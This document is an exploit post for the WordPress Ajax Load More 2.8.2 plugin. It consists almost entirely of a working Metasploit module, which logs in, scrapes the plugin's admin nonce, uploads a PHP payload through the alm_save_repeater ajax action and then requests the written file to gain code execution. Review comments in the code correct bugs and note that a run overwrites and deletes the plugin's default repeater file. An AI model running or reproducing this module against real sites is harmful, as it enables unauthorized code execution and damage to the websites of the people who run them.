WordPress ajax-load-more 2.8.2 Authenticated Arbitrary File Upload Vulnerability

2015.11.19
Credit: 4TT4CK3R
Risk: High (post-authentication: the attacker needs a valid WordPress login; code execution follows from writing a PHP file under the plugin directory)
Local: No
Remote: Yes
CVE: N/A
CWE: N/A (none assigned on this page; the behaviour described — attacker-controlled PHP written to a web-reachable plugin path via an admin-ajax action — falls in the CWE-434 class, Unrestricted Upload of File with Dangerous Type)

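[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit Title : WordPress ajax-load-more 2.8.2 Authenticated Arbitrary File Upload Vulnerability
~# : Exploit Author : 4TT4CK3R
~# : Date : 2015/11/19
~# : Tested on : Kali Linux, Mozilla Firefox, Windows 8.1
~# : Google Dork : No
~# : Version : 2.8.2
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : This exploit is a Metasploit module; the Metasploit Framework is required to run it.
~# : Website for downloading Metasploit : http://www.metasploit.com/download
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Module :

require 'msf/core'

# WordPress "Ajax Load More" 2.8.2, authenticated arbitrary file write.
#
# Flow: log in with the supplied WordPress credentials, scrape the plugin's
# admin nonce ("alm_admin_nonce") from the user's profile page, then POST the
# PHP payload to admin-ajax.php as an `alm_save_repeater` action with
# type=default. The plugin stores the submitted "value" as a .php file under
# its web-reachable core/repeater directory, which is then requested to trigger
# the payload.
#
# The page does not say which WordPress role is required beyond "a valid
# login"; confirm the capability check the plugin applies before relying on
# low-privilege accounts.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  # Path segments, below the plugins URL, where the saved repeater lives.
  REPEATER_PATH = %w[ajax-load-more core repeater].freeze

  # Filename the module expects the plugin to write for type=default.
  # NOTE(review): this is very likely the plugin's own shipped default repeater
  # template, so a successful run overwrites a legitimate file and FileDropper
  # *deletes* it on cleanup rather than restoring it. Confirm the impact on the
  # target's Ajax Load More functionality before using this on a live site.
  REPEATER_FILE = 'default.php'.freeze

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Plugin ajax-load-more Authenticated Arbitrary2.8.2 File Upload Vulnerability',
      'Description'    => %q{
        one of WordPress plugins called ajax-load-more Authenticated Arbitrary have File Uploading vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        '4TT4CK3R <MyGmail[A]gmail[.]com',
      ],
      'References'     => [
        ['WPVDB', '8209']
      ],
      'DisclosureDate' => 'Oct 02 2015',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ajax-load-more', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class)
  end

  # WordPress username supplied by the operator.
  def user
    datastore['WP_USER']
  end

  # WordPress password supplied by the operator.
  def password
    datastore['WP_PASSWORD']
  end

  # Detect the plugin from its readme.txt.
  #
  # The original passed 'ajax-load-more, 2.8.2' as a single string, which is not
  # a plugin directory name and so could never locate
  # wp-content/plugins/<slug>/readme.txt. It also wrapped the helper's
  # CheckCode in `if ver`, which is always truthy, so every run reported
  # Appears. The helper already returns a CheckCode, so return it directly.
  # No fixed version is passed because the page does not state one; the
  # helper is therefore expected to report the plugin as Detected rather than
  # decide Appears/Safe (verify against the framework version in use).
  def check
    check_plugin_version_from_readme('ajax-load-more')
  end

  # Entry point: authenticate, fetch the nonce, write the payload, trigger it.
  def exploit
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as #{user}") if cookie.nil?

    nonce = fetch_alm_nonce(cookie)
    upload_repeater(cookie, nonce)

    print_status("#{peer} - Calling uploaded file #{REPEATER_FILE}")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, *REPEATER_PATH, REPEATER_FILE)
    )
  end

  # Scrape the plugin's admin nonce from the logged-in user's profile page.
  #
  # The module looks for the literal `"alm_admin_nonce":"<hex>"` in the page
  # body (presumably emitted by the plugin's admin script localisation).
  # Fails the module cleanly if the page is unreachable, returns a non-200, or
  # contains no nonce.
  def fetch_alm_nonce(cookie)
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => url,
      'cookie' => cookie
    )

    # The original read res.code in its failure branch even when res was nil
    # (no response at all), which raised NoMethodError instead of failing.
    fail_with(Failure::Unreachable, "#{peer} - No response while accessing user profile page.") if res.nil?
    unless res.code == 200
      fail_with(Failure::UnexpectedReply,
                "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end

    # e.g. "alm_admin_nonce":"e58b6d536d"
    match = res.body.to_s.match(/"alm_admin_nonce":"([0-9a-f]+)"/)
    if match.nil?
      vprint_error("#{peer} #{res.body}")
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
    end

    nonce = match[1]
    print_good("#{peer} Found ajax-load-more wp_nonce value : #{nonce}")
    nonce
  end

  # POST the payload to admin-ajax.php as an `alm_save_repeater` request.
  #
  # type=default is sent, and the module assumes the plugin then writes the
  # "value" field to REPEATER_FILE; the random "repeater" name is still sent
  # to satisfy the action but is presumably not used for the filename in the
  # default case — TODO confirm against the plugin source.
  def upload_repeater(cookie, nonce)
    print_status("#{peer} - Trying to upload payload")
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part(rand_text_alpha_lower(3), nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')

    print_status("#{peer} - Uploading ...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(wordpress_url_admin_ajax),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s,
      'cookie' => cookie
    )

    fail_with(Failure::Unreachable, 'Server did not respond in an expected way') if res.nil?
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code : #{res.code}")
    end

    lines = res.body.to_s.split("\n")
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected empty server response") if lines.empty?

    # The module checks the last line of the body for the plugin's success text.
    message = lines.last
    if message.include?('Saved Successfully')
      register_files_for_cleanup(REPEATER_FILE)
    else
      # Deliberately not fatal: the original continued to request the file
      # regardless, and the success text may vary between plugin versions. If
      # nothing was written, the trigger request in exploit simply yields no
      # session. Surfaced as a warning rather than a verbose-only message so
      # the operator sees why cleanup was not registered.
      print_warning("#{peer} - Unexpected web page content : #{message}")
    end
  end
end

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Discovered by : 4TT4CK3R
~# : This exploit was discovered two months ago but is only being registered today.
~# : Special thanks to : Sina Sadrifar , Atefe Mohammadlou , Mahdieh Saboor , Raziyeh Zeinali !!!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]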

